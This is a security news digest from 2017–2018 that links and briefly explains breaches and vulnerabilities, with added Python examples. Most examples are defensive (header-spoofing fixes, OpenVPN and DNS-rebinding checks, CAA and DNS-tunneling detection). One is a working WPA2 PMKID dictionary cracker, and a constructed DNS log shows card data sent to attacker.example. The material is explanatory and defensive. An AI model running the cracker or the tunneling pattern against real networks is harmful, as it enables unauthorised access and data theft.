Tag DNS

InfoSec Week 32, 2018

A Comcast security flaw exposed the personal information of more than 26 million customers. The login page trusted the client-supplied "X-Forwarded-For" header as the visitor's IP address, so an attacker who put a customer's IP address into that header got that customer's location back.
https://www.buzzfeednews.com/article/nicolenguyen/a-comcast-security-flaw-exposed-millions-of-customers
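The bug is a generic pattern, not something specific to Comcast: the server believes a header any client can send. The added example below is not from the article or from Comcast's code; it shows the vulnerable lookup next to a hardened one that only honours X-Forwarded-For when the TCP peer is one of our own reverse proxies (the 10.0.0.0/8 range is a constructed assumption) and walks the header from the right, skipping our proxies, so the attacker's prepended value is ignored.

```python
import ipaddress

# Constructed for this example: address ranges of the reverse proxies we run.
# Only these peers are allowed to set X-Forwarded-For on our behalf.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip_naive(headers: dict, remote_addr: str) -> str:
    """The vulnerable pattern: believe whatever the request put in X-Forwarded-For.
    Anyone can send this header, so the 'client IP' is attacker-controlled."""
    xff = headers.get("X-Forwarded-For", "")
    first_hop = xff.split(",")[0].strip()
    return first_hop or remote_addr


def client_ip_hardened(headers: dict, remote_addr: str) -> str:
    """Hardened version:
    1. honour X-Forwarded-For only when the TCP peer is one of our own proxies;
    2. walk the header from the right (each proxy appends the peer it saw) and
       skip our own proxy addresses; the first untrusted address is the client;
    3. fall back to the socket peer on anything malformed."""
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer):
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # garbage in the header: do not guess
        if not _is_trusted_proxy(addr):
            return str(addr)
    return remote_addr


if __name__ == "__main__":
    # Constructed request: a direct client spoofs a victim's address in the header.
    spoofed = {"X-Forwarded-For": "203.0.113.5"}
    print("naive   :", client_ip_naive(spoofed, "198.51.100.7"))     # attacker's choice
    print("hardened:", client_ip_hardened(spoofed, "198.51.100.7"))  # real socket peer
```

The same spoofed header arriving through a trusted proxy still does not help the attacker: the proxy appends the real peer on the right, and the hardened function takes the rightmost untrusted address.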

According to Check Point Research, more than 150k computers are infected with a new variant of the Ramnit botnet named Black. The botnet installs a second-stage malware with proxy functionality.
https://research.checkpoint.com/ramnits-network-proxy-servers/

Malware infected Apple chip maker Taiwan Semiconductor Manufacturing Co. (TSMC). Production at its factories was halted last week, but the company has already recovered from the attack.
https://www.bloomberg.com/news/articles/2018-08-04/tsmc-takes-emergency-steps-as-operations-hit-by-computer-virus

A flaw in the Linux kernel's TCP stack can be used for a remote denial of service (CVE-2018-5390, "SegmentSmack"). The attack requires fewer than 2,000 packets per second of traffic within an established TCP session.
https://access.redhat.com/articles/3553061

Cookie consent scripts, including GDPR-themed ones, are being used to distribute malware.
https://blog.sucuri.net/2018/08/cookie-consent-script-used-to-distribute-malware.html

Interesting blog post on how criminals in Iran make money with Android malware apps.
https://blog.certfa.com/posts/pushiran-dl-malware-family/

Let's Encrypt's root CA certificate (ISRG Root X1) is now trusted by all major root programs. On some platforms they still depended on the cross-signature from IdenTrust, so this is great news!
https://letsencrypt.org/2018/08/06/trusted-by-all-major-root-programs.html

There is a really effective new attack on WPA/WPA2 PSK (Pre-Shared Key) passwords. The attacker simply asks the access point to associate and reads the PMKID from the RSN IE of the first EAPOL frame; that value is enough for offline cracking, so no client traffic needs to be sniffed anymore.
https://hashcat.net/forum/thread-7717.html
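Why the PMKID is enough: it is a keyed hash over the PMK, which is itself derived only from the passphrase and the SSID. The added example below is not hashcat's code; it derives the PMK and PMKID exactly as the WPA2 standard defines them and runs a small dictionary attack over a line in the hashcat "16800" format (PMKID*MAC_AP*MAC_STA*ESSID_hex). The MAC addresses, SSID and wordlist are constructed for the example; the "password"/"IEEE" vector is the PBKDF2 test vector from IEEE 802.11i.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step, and it is the same one a 4-way-handshake crack performs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), i.e. the first
    16 bytes of the HMAC. The AP sends this value in the first EAPOL frame, so the
    attacker needs nothing from a real client."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def crack_pmkid(line: str, wordlist):
    """Offline dictionary attack on one hashcat -m 16800 line:
    PMKID*MAC_AP*MAC_STA*ESSID_hex. Returns the passphrase or None."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    target = bytes.fromhex(pmkid_hex)
    mac_ap, mac_sta = bytes.fromhex(ap_hex), bytes.fromhex(sta_hex)
    ssid = bytes.fromhex(essid_hex).decode()
    for candidate in wordlist:
        guess = compute_pmkid(derive_pmk(candidate, ssid), mac_ap, mac_sta)
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def make_16800_line(passphrase: str, ssid: str, mac_ap: bytes, mac_sta: bytes) -> str:
    """Constructed helper: build the capture line an AP would leak, for testing."""
    pmkid = compute_pmkid(derive_pmk(passphrase, ssid), mac_ap, mac_sta)
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex()])


if __name__ == "__main__":
    # Constructed sample: made-up MACs, SSID and wordlist, not a real capture.
    line = make_16800_line("correct horse", "TestNet",
                           bytes.fromhex("a0b1c2d3e4f5"), bytes.fromhex("0a1b2c3d4e5f"))
    print(line)
    print(crack_pmkid(line, ["password", "letmein", "correct horse"]))
```

The cost per guess is the 4096-round PBKDF2, which is why the only real defence is a long, random passphrase (or WPA3's SAE, which has no offline-crackable value at all).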

Innovative new research on software implementation hardening was published under the name "Chaff Bugs: Deterring Attackers by Making Software Buggier".
The idea is simple: inject a large number of non-exploitable bugs into the program, which makes bug triage and exploit development significantly harder.
https://arxiv.org/abs/1808.00659

Researchers from the University of Milan published a padding oracle attack against Telegram Passport.
Don't roll your own cryptographic schemes if other people depend on them...
https://pequalsnp-team.github.io/writeups/analisys_telegram_passport

Handshake is a new experimental peer-to-peer root DNS. They have published the resolver source code and have a test network up and running. Looks like a really promising project.
https://handshake.org/

InfoSec Week 26, 2018

An OpenVPN configuration file can spawn a reverse shell: directives such as `up` run an arbitrary command when the tunnel comes up. So be cautious and treat .ovpn files like shell scripts.
https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da
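A practical check before importing a profile someone sent you: list every directive that makes OpenVPN execute something. The added example below is not from the Tenable post; the directive list is taken from the OpenVPN manual's script hooks, and the sample profile is constructed (the `up` target is a placeholder, not a real payload).

```python
# Directives that make OpenVPN run an external program or load native code.
# With "script-security 2" (or higher) the scripts run as the OpenVPN user,
# which is usually root.
EXEC_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "client-connect",
    "client-disconnect", "learn-address", "auth-user-pass-verify", "tls-verify",
    "plugin", "script-security",
}


def audit_ovpn(text: str):
    """Return [(line_no, line)] for every directive in an .ovpn file that can execute code."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":       # OpenVPN comment lines start with # or ;
            continue
        # Be tolerant of a leading "--" in case the line was pasted from a command line.
        directive = line.lstrip("-").split(None, 1)[0].lower()
        if directive in EXEC_DIRECTIVES:
            findings.append((n, raw.rstrip()))
    return findings


# Constructed sample profile, not taken from the article.
SAMPLE_OVPN = """\
client
dev tun
remote vpn.example.com 1194
; up /etc/openvpn/commented-out.sh
script-security 2
up "/tmp/not-a-script"
"""

if __name__ == "__main__":
    for n, line in audit_ovpn(SAMPLE_OVPN):
        print(f"line {n}: {line}")
```

A hit is not automatically malicious (corporate profiles legitimately use `up` for DNS setup), but every hit should be read before the file is imported, and a profile from an untrusted source with `script-security 2` plus any hook is a red flag.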

Mozilla is integrating Troy Hunt's Have I Been Pwned (HIBP) database of breached accounts into Firefox. The breach data will be searchable via a new tool called Firefox Monitor.
https://www.troyhunt.com/were-baking-have-i-been-pwned-into-firefox-and-1password/

The suspected ringleader behind the well-known Carbanak malware is under arrest, but of course his malware attacks live on.
https://www.bloomberg.com/news/features/2018-06-25/the-biggest-digital-heist-in-history-isn-t-over-yet

It is possible to attack resources on a private network from the Internet with a DNS rebinding attack: the attacker's hostname first resolves to their own server and then, once the short TTL expires, to an internal address, so the browser's same-origin policy lets the attacker's script talk to the internal device.
"Following the wrong link could allow remote attackers to control your WiFi router, Google Home, Roku, Sonos speakers, home thermostats and more."
https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
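The two places where rebinding can be stopped are the resolver and the device. The added example below is not from the article; it shows both checks: a resolver-side filter that refuses answers mapping an external name onto an internal address (the idea behind dnsmasq's --stop-dns-rebind, with an allowlist for split-horizon names), and a device-side Host header check, which works because after the rebind the browser still sends the attacker's hostname in Host. Names and addresses are constructed.

```python
import ipaddress

# Address ranges a public hostname should never resolve to from the point of view
# of a home or office resolver.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_rebinding_answer(qname: str, answers, allowlist=()) -> bool:
    """Resolver-side filter: drop answers that map an external name onto an
    internal address, unless the name is explicitly allowed (split-horizon zones)."""
    name = qname.rstrip(".").lower()
    if name in {a.rstrip(".").lower() for a in allowlist}:
        return False
    for rdata in answers:
        addr = ipaddress.ip_address(rdata)
        if addr.version == 6 and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped        # ::ffff:192.168.1.1 still points inside
        if any(addr in net for net in INTERNAL_NETS):
            return True
    return False


def host_header_ok(host_header: str, expected_hosts) -> bool:
    """Device-side defence: a service that only answers requests whose Host header
    names it (its own IP or hostname) will reject the rebound request, because
    that request carries the attacker's domain in Host."""
    host = host_header.strip()
    if host.startswith("[") and "]" in host:   # bracketed IPv6 literal, e.g. [::1]:8080
        host = host[1:host.index("]")]
    else:
        host = host.split(":", 1)[0]
    host = host.lower().rstrip(".")
    return host in {h.lower().rstrip(".") for h in expected_hosts}


if __name__ == "__main__":
    # Constructed attack sequence: first answer is the attacker's server, second
    # answer (after TTL expiry) is the victim's router.
    for answer in (["203.0.113.10"], ["192.168.1.1"]):
        print(answer, "blocked" if is_rebinding_answer("rebind.attacker.example", answer) else "ok")
    # The rebound request still says Host: rebind.attacker.example
    print(host_header_ok("rebind.attacker.example", {"192.168.1.1", "router.local"}))
```

The resolver filter breaks legitimate services that intentionally return private addresses (hence the allowlist); the Host check has no such cost and is the fix device vendors should ship.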

The Wi-Fi Alliance introduces Wi-Fi CERTIFIED WPA3 security. Again with questionable cryptography (the Dragonfly/SAE handshake), but we will see. That's how industry alliances with expensive membership work.
https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-wi-fi-certified-wpa3-security

The IETF published a draft on issues and requirements for Server Name Indication (SNI) encryption in TLS.
The draft lists known attacks against SNI encryption, discusses the current "co-tenancy fronting" workaround, and presents requirements for future TLS-layer solutions.
https://tools.ietf.org/html/draft-ietf-tls-sni-encryption-03

An unpatched WordPress vulnerability lets an attacker with Author privileges delete any file of the WordPress installation, or any other file the PHP process user has permission to delete. Deleting wp-config.php lets the attacker re-run the installer against their own database and reach code execution.
https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

Researchers identified three attack vectors against LTE (Long-Term Evolution, i.e. 4G) on layer 2: an active attack (aLTEr) that redirects network packets by manipulating DNS requests, a passive identity mapping attack, and website fingerprinting based on resource allocation.
https://alter-attack.net/

The Cisco Talos team released ThanatosDecryptor, a program that attempts to decrypt files encrypted by the Thanatos ransomware.
https://github.com/Cisco-Talos/ThanatosDecryptor

DEDA is a tool that can read out and decode the yellow tracking dots that color laser printers add to every page, which encode information such as the printer's serial number. It can also anonymise documents to prevent such tracking.
https://github.com/dfd-tud/deda

InfoSec Week 17, 2018

A loud sound emitted by a gas-based fire suppression system destroyed the hard drives of a Swedish data center, taking NASDAQ operations across Northern Europe down.
https://www.bleepingcomputer.com/news/technology/loud-sound-from-fire-alarm-system-shuts-down-nasdaqs-scandinavian-data-center/

Signal for iOS, version 2.23.1.1 and earlier, is vulnerable to a screen lock bypass (CVE-2018-9840).
The blog post explains how the vulnerability can be exploited in practice.
http://nint.en.do/Signal-Bypass-Screen-locker.php

Good summary of integrated circuit counterfeiting and of detection and avoidance methods, by hardware engineer Yahya Tawil.
https://atadiat.com/en/e-introduction-counterfeit-ics-counterfeiting-detection-avoidance-methods/

PyRoMine, a new Python-based cryptocurrency mining malware (reported by FortiGuard Labs), uses the ETERNALROMANCE exploit attributed to the NSA to propagate a Monero miner.
https://securityboulevard.com/2018/04/python-based-malware-uses-nsa-exploit-to-propagate-monero-xmr-miner/

The Australian Bureau of Statistics tracked people by their mobile device data to enrich its data collection, without telling them.
https://medium.com/@Asher_Wolf/the-australian-bureau-of-statistics-tracked-people-by-their-mobile-device-data-and-didnt-tell-them-16df094de31

A BGP hijack of Amazon Route 53 address space rerouted DNS traffic for more than two hours. The attackers used the hijack to answer queries for MyEtherWallet.com with the address of a fake copy of the site and steal cryptocurrency.
https://doublepulsar.com/hijack-of-amazons-internet-domain-service-used-to-reroute-web-traffic-for-two-hours-unnoticed-3a6f0dda6a6f

Embedi researchers analyzed the firmware of a Huawei Secospace USG6330 firewall. Good insight into how to analyze such devices in general.
https://embedi.com/blog/first-glance-on-os-vrp-by-huawei/

ISO has rejected the SIMON and SPECK symmetric encryption algorithms designed and proposed by the NSA. The algorithms are optimized for small, low-cost processors such as those in IoT devices.
https://www.schneier.com/blog/archives/2018/04/two_nsa_algorit.html

The Center for Information Technology Policy at Princeton announced IoT Inspector, an ongoing initiative to study consumer IoT security and privacy.
https://freedom-to-tinker.com/2018/04/23/announcing-iot-inspector-a-tool-to-study-smart-home-iot-device-behavior/

There is a proof of concept for Fusée Gelée, a coldboot vulnerability that allows full, unauthenticated arbitrary code execution on NVIDIA's Tegra line of embedded processors (including the one in the Nintendo Switch). The vulnerability compromises the entire root of trust for each processor, leading to full compromise of on-device secrets wherever USB access is possible.
https://github.com/reswitched/fusee-launcher/blob/master/report/fusee_gelee.md

InfoSec Week 16, 2018

Google disabled the domain fronting capability in its App Engine, which was used to evade censorship. What fortunate timing.
https://arstechnica.com/information-technology/2018/04/google-disables-domain-fronting-capability-used-to-evade-censors/

Bloomberg published an article on how Palantir is using War on Terror tools to track American citizens.
https://www.bloomberg.com/features/2018-palantir-peter-thiel/

Third-party JavaScript trackers are actively exfiltrating personal identifiers from websites that use the "Login with Facebook" button and similar social login APIs.
https://freedom-to-tinker.com/2018/04/18/no-boundaries-for-facebook-data-third-party-trackers-abuse-facebook-login/

The U.S. and the UK blame Russia for a campaign of intrusions into routers, switches and other network infrastructure.
https://www.forbes.com/sites/thomasbrewster/2018/04/16/russia-accused-of-hacking-network-infrastructure/

One of the people charged in the Reveton ransomware case was working as a Microsoft network engineer at the time.
https://www.bleepingcomputer.com/news/security/microsoft-engineer-charged-in-reveton-ransomware-case/

Intel processors now allow antivirus software (mostly Microsoft's Windows Defender ATP right now) to use the built-in GPU for in-memory malware scanning.
https://arstechnica.com/gadgets/2018/04/intel-microsoft-to-use-gpu-to-scan-memory-for-malware/

Avast shared the CCleaner breach timeline. The attackers got in via TeamViewer. More than 2.3 million users ran the trojanized build, and a handful of machines at selected technology companies received the second stage.
https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer

Nice blog post about quantum-resistant hash-based signature schemes, whose security rests only on the underlying hash function rather than on RSA or elliptic-curve assumptions.
https://blog.cryptographyengineering.com/2018/04/07/hash-based-signatures-an-illustrated-primer/

The new Android P lets users configure a custom DNS server and also supports DNS over TLS, via the Private DNS setting.
https://www.androidpolice.com/2018/04/14/google-explains-new-private-dns-setting-android-p/

There is a new web standard for authentication (WebAuthn), designed to replace password login with public key cryptography backed by authenticators such as security keys and biometrics.
https://www.w3.org/TR/2018/CR-webauthn-20180320/

OpenSSL is vulnerable to a cache-timing side channel in RSA key generation (CVE-2018-0737).
It could in theory be exploited by a process or VM sharing a cache with the victim, but the project decided not to release an emergency fix.
https://mta.openssl.org/pipermail/openssl-announce/2018-April/000122.html

Endgame has released Ember (Endgame Malware BEnchmark for Research), an open source collection of metadata and derived features from 1.1 million portable executable (PE) files, their hashes, and a benchmark model trained on those features.
https://github.com/endgameinc/ember

InfoSec Week 14, 2018

There is a critical flaw in the Microsoft Malware Protection Engine (CVE-2018-0986). Microsoft took the open source unrar code and changed all the signed ints to unsigned, which broke its bounds checks. The result is remote memory corruption as SYSTEM.
https://bugs.chromium.org/p/project-zero/issues/detail?id=1543&desc=2

Blog post by Latacora about the right choices and parameters for cryptography for backups, communication, authentication, etc. Nice summary, with explanations and historical references.
http://latacora.singles/2018/04/03/cryptographic-right-answers.html

The Italian football club Lazio was scammed by a social engineering attack via email. The club paid a €2 million transfer instalment to a fraudster's bank account instead of to the Dutch club Feyenoord.
https://www.hackread.com/phishing-scam-italian-football-club-scammed/

The people behind Google's Wycheproof project, which tests crypto libraries against known attacks, released test vectors for many crypto primitives.
https://github.com/google/wycheproof/tree/master/testvectors

Cloudflare announced a consumer DNS service at the 1.1.1.1 address. It supports DNS-over-TLS and DNS-over-HTTPS.
https://blog.cloudflare.com/announcing-1111/

Good explanatory blog post about Oblivious DNS and why DNS should not require us to trust the resolver at all.
https://freedom-to-tinker.com/2018/04/02/a-privacy-preserving-approach-to-dns/

There is a local privilege escalation vulnerability (CVE-2018-0492) in the Debian beep package. Yes, the package that beeps the PC speaker. It is setuid root and has a race condition, hence the escalation.
https://mta.openssl.org/pipermail/openssl-announce/2018-March/000119.html

LibreSSL 2.7.0 was accepting all invalid host names as valid. The bug was found by Python core developer Christian Heimes while running the test suite after porting Python 3.7 to the new LibreSSL. Nobody was affected.
https://mail.python.org/pipermail/python-dev/2018-April/152624.html

VirusTotal launched VirusTotal Droidy, a new Android sandbox to help security researchers detect malicious apps through behavioral analysis.
http://blog.virustotal.com/2018/04/meet-virustotal-droidy-our-new-android.html

MesaLink is a new memory-safe and OpenSSL-compatible TLS library written in Rust.
https://github.com/mesalock-linux/mesalink

InfoSec Week 7, 2018

Fidelis Cybersecurity researcher Jason Reaves demonstrated how to covertly exchange data using X.509 digital certificates. The proof of concept code hides the data in the SubjectKeyIdentifier extension and generates certificates on the fly.
https://www.fidelissecurity.com/threatgeek/2018/02/exposing-x509-vulnerabilities

The "UDPoS" Point of Sale malware uses DNS traffic to exfiltrate stolen credit card data.
https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns

Talos analyzed Olympic Destroyer, the malware that targeted Olympic computer systems during the opening ceremony. Its main purpose was to gather information and then render the systems unusable.
http://blog.talosintelligence.com/2018/02/olympic-destroyer.html

A zero-day vulnerability in the Bitmessage messaging client was exploited to steal Electrum cryptocurrency wallet keys.
https://securityaffairs.co/wordpress/69100/hacking/bitmessage-zero-day.html

Trustwave analyzed a multi-stage Microsoft Word attack that does NOT use macros. Really creative technique.
https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/

Microsoft can't fix the Skype privilege escalation bug (in the updater) without a massive code rewrite, so they postponed it for a while.
http://seclists.org/fulldisclosure/2018/Feb/33

Facebook is advertising its Onavo VPN application, but there are a few reasons why using it is really not a good idea.
https://gizmodo.com/do-not-i-repeat-do-not-download-onavo-facebook-s-vam-1822937825

Facebook is spamming users via the phone numbers they registered for two-factor authentication (2FA), and then posts their SMS replies to their wall.
https://twitter.com/Gabriel__Lewis/status/963121814166630400

(Not only) performance analysis of the Retpoline mitigation for the Spectre vulnerability.
https://cyber.wtf/2018/02/13/in-debt-to-retpoline/

A guide on how to brute-force Linux Full Disk Encryption (LUKS) volumes using Hashcat.
https://blog.pnb.io/2018/02/bruteforcing-linux-full-disk-encryption.html

Proof of concept of a LibreOffice remote arbitrary file disclosure vulnerability. A crafted document can silently send any local file to a remote server. All operating systems are affected before versions 5.4.5/6.0.1.
https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure

InfoSec Week 3, 2018

The notorious Necurs spam botnet is sending millions of spam emails pumping an obscure shitcoin named Swisscoin. The attackers are probably invested and are expecting to run a pump-and-dump scheme.
https://www.bleepingcomputer.com/news/cryptocurrency/worlds-largest-spam-botnet-is-pumping-and-dumping-an-obscure-cryptocurrency/

Nice article on Russia's hacking capabilities against foreign critical infrastructure.
https://www.fastcompany.com/40515682/the-other-scary-foreign-hacking-threat-trump-is-ignoring

Taiwanese police handed out malware-infected USB sticks as prizes for a cybersecurity quiz. The malware was an old sample trying to communicate with a non-existent C&C server in Poland. The thumb drives were infected at a third-party contractor.
https://www.theregister.co.uk/AMP/2018/01/10/taiwanese_police_malware/

New research analyzes the usage of Certificate Authority Authorization (CAA) DNS records. CAA records let domain owners state explicitly which certificate authorities may issue certificates for their domain. Only 4 of the large DNS operators that dominate the Internet's DNS infrastructure let their customers configure CAA records, but things are getting better after this audit.
https://caastudy.github.io/
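What a CA actually has to do with those records is small but easy to get wrong: find the governing RRset by climbing toward the root, then match the issuer against "issue" (or "issuewild" for wildcard requests), refusing on an unknown critical property. The added example below is not the study's code; it implements that lookup over a dictionary standing in for DNS answers (the zone content is constructed, and CNAME following, which a real resolver must also do, is left out).

```python
def relevant_caa(zone: dict, domain: str) -> list:
    """RFC 8659 s.3: start at the requested name and climb toward the root; the
    first non-empty CAA RRset found governs issuance. An empty result means no
    CAA policy exists anywhere in the tree, so any CA may issue."""
    labels = domain.rstrip(".").lower().split(".")
    while labels:
        rrset = zone.get(".".join(labels))
        if rrset:
            return rrset
        labels.pop(0)
    return []


def parse_caa(record: str):
    """'0 issue "letsencrypt.org"' -> (flags, tag, value)."""
    flags, tag, value = record.split(None, 2)
    return int(flags), tag.lower(), value.strip().strip('"')


def may_issue(zone: dict, domain: str, ca_domain: str) -> bool:
    """Decide whether the CA identified by ca_domain may issue for domain.
    A leading '*.' makes it a wildcard request, which prefers issuewild."""
    wildcard = domain.startswith("*.")
    name = domain[2:] if wildcard else domain
    rrset = [parse_caa(r) for r in relevant_caa(zone, name)]
    if not rrset:
        return True
    # Flag bit 128 = critical: a property the CA does not understand forbids issuance.
    if any(flags & 128 and tag not in ("issue", "issuewild", "iodef") for flags, tag, _ in rrset):
        return False
    tag = "issue"
    if wildcard and any(t == "issuewild" for _, t, _ in rrset):
        tag = "issuewild"
    values = [v for _, t, v in rrset if t == tag]
    if not values:
        return True          # RRset exists (e.g. only iodef) but does not restrict issuers
    for v in values:
        issuer = v.split(";", 1)[0].strip().lower()   # drop parameters such as "; accounturi=..."
        if issuer and issuer == ca_domain.lower():
            return True
    return False             # includes the 'issue ";"' case: nobody may issue


# Constructed zone data standing in for CAA lookups; not real domains.
ZONE = {
    "example.com": ['0 issue "letsencrypt.org"', '0 iodef "mailto:security@example.com"'],
    "locked.example.com": ['0 issue ";"'],
    "nowild.example.com": ['0 issue "letsencrypt.org"', '0 issuewild ";"'],
    "params.example.com": ['0 issue "letsencrypt.org; validationmethods=dns-01"'],
    "strict.example.com": ['128 futuretag "unknown"'],
}

if __name__ == "__main__":
    for req, ca in (("www.example.com", "letsencrypt.org"), ("www.example.com", "digicert.com"),
                    ("*.nowild.example.com", "letsencrypt.org"), ("locked.example.com", "letsencrypt.org")):
        print(f"{req:28} {ca:18} -> {'allowed' if may_issue(ZONE, req, ca) else 'refused'}")
```

Note the asymmetry that the study's numbers make painful: an absent record means "anyone", so a domain owner whose DNS operator cannot publish CAA gets no protection at all, while a single `issue ";"` at the apex locks the whole tree unless a subdomain overrides it.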

Lenovo engineers discovered a backdoor affecting RackSwitch and BladeCenter switches running ENOS (Enterprise Network Operating System). The company has already released firmware updates.
The backdoor was added to the source code in 2004, when it was maintained by Nortel.
https://www.bleepingcomputer.com/news/security/lenovo-discovers-and-removes-backdoor-in-networking-switches/

Nice technical report on PowerStager, a Python / C / PowerShell malware used in the Pyeongchang Olympic themed spear-phishing attack.
https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/

InfoSec Week 17, 2017

A team of researchers from New York University identified a severe flaw in General Electric Multilin protection relays, which are widely deployed in the US energy sector.
https://www.blackhat.com/us-17/briefings.html#and-then-the-script-kiddie-said-let-there-be-no-light.-are-cyber-attacks-on-the-power-grid-limited-to-nation-state-actors

Kaspersky Lab analyzed Backdoor.Win32.Denis, malware using DNS tunneling as its C&C communication channel. Base64 is not encryption, though.
https://securelist.com/blog/research/78203/use-of-dns-tunneling-for-cc-communications/
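Both the UDPoS exfiltration (InfoSec Week 7 above) and the Denis tunneling use the same trick: data goes into the subdomain labels of queries for a domain the attacker controls, and the attacker's authoritative server reads it. That shape is visible in a query log. The added example below is neither Forcepoint's nor Kaspersky's code; it runs three cheap detections over constructed log lines (format "time client qname qtype", made up for the example): subdomain length, Shannon entropy of the subdomain, and the number of distinct subdomains seen per registered domain, which catches short beacons that pass the per-query checks. It also base64-decodes what it finds, which is the "not encryption" point: if the malware only encodes, the card data is readable straight off the wire.

```python
import base64
import binascii
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character. Ordinary host labels sit around 2-3; base64/base32 payloads run 4+."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str, registered_labels: int = 2):
    """Split 'payload.attacker.example' into (subdomain part, registered domain).
    Assumption for this example: the registered domain is the last two labels;
    a real deployment would consult the public suffix list. Case is kept on the
    subdomain because base64 is case-sensitive."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-registered_labels]), ".".join(labels[-registered_labels:]).lower()


def try_decode(subdomain: str):
    """Labels are joined first because a payload longer than 63 bytes has to be
    chunked across several labels. Returns the text or None if it is not base64url/ASCII."""
    data = subdomain.replace(".", "")
    data += "=" * (-len(data) % 4)
    try:
        return base64.urlsafe_b64decode(data).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def analyze(log_text: str, min_len: int = 20, min_entropy: float = 3.5):
    """Scan 'time client qname qtype' lines. Returns (per-query findings,
    {registered domain: number of distinct subdomains})."""
    findings = []
    unique_subs = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, qname, qtype = parts[:4]
        sub, base = split_name(qname)
        if sub:
            unique_subs[base].add(sub)
        ent = shannon_entropy(sub)
        if len(sub) >= min_len and ent >= min_entropy:
            findings.append({"time": ts, "client": client, "qtype": qtype, "domain": base,
                             "subdomain": sub, "entropy": round(ent, 2), "decoded": try_decode(sub)})
    return findings, {d: len(s) for d, s in unique_subs.items()}


def _b64label(text: str) -> str:
    """Constructed helper: how a tunnel might pack data into a label (base64url, no padding)."""
    return base64.urlsafe_b64encode(text.encode()).decode().rstrip("=")


# Constructed sample log; the card numbers and domain are fake.
SAMPLE_LOG = "\n".join([
    "12:00:01 10.1.1.20 www.example.com A",
    "12:00:02 10.1.1.20 mail.example.com MX",
    f"12:00:03 10.1.1.45 {_b64label('4532 7158 9902 6341|09/21|447|JANE DOE')}.attacker.example A",
    f"12:00:04 10.1.1.45 {_b64label('5418 2094 3377 6125|04/22|912|JOHN DOE')}.attacker.example A",
    f"12:00:05 10.1.1.45 {_b64label('heartbeat-1337')}.attacker.example A",
    "12:00:06 10.1.1.20 cdn.example.net A",
])

if __name__ == "__main__":
    hits, per_domain = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["client"], h["domain"], h["entropy"], h["decoded"])
    print(per_domain)
```

Real tunnels usually prefer base32 or hex because resolvers may change the case of labels, so a production rule would try those decoders too; the length and cardinality signals do not depend on the encoding.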

Check Point researchers discovered a new Mac malware family (OSX/Dok) that uses nag screens to obtain admin privileges, Tor to hide traffic diverted to a remote proxy, and a rogue certificate to intercept encrypted browser traffic. It spreads via email spam.
http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

A critical vulnerability (CVE-2017-5135) in the SNMP implementation of at least 78 cable modem models allows an attacker to take over the device.
https://www.bleepingcomputer.com/news/security/several-cable-modem-models-affected-by-snmp-god-mode-flaw/

Wired wrote about research on Android applications that turn the smartphone into a file server, exposing open ports to the Internet, and why that is dangerous.
https://www.wired.com/2017/04/obscure-app-flaw-creates-backdoors-millions-smartphones/

The CIA's document tracking program Scribbles allegedly embeds a web beacon-style tag into watermarks in Microsoft Word documents, which reports document analytics back to the CIA.
https://wikileaks.org/vault7/#Scribbles

The Antminer bitcoin mining hardware has a backdoor (Antbleed) that can disable the miner remotely.
http://www.antbleed.com/
https://www.reddit.com/r/Bitcoin/comments/67qwqv/antbleed_exposing_the_malicious_backdoor_on/dgsk6cf/

Troy Hunt published a blog post about some of the most insane password reset schemes, security questions, and corporate responses he has seen over his career.
https://www.troyhunt.com/reckon-youve-seen-some-stupid-security-things-here-hold-my-beer/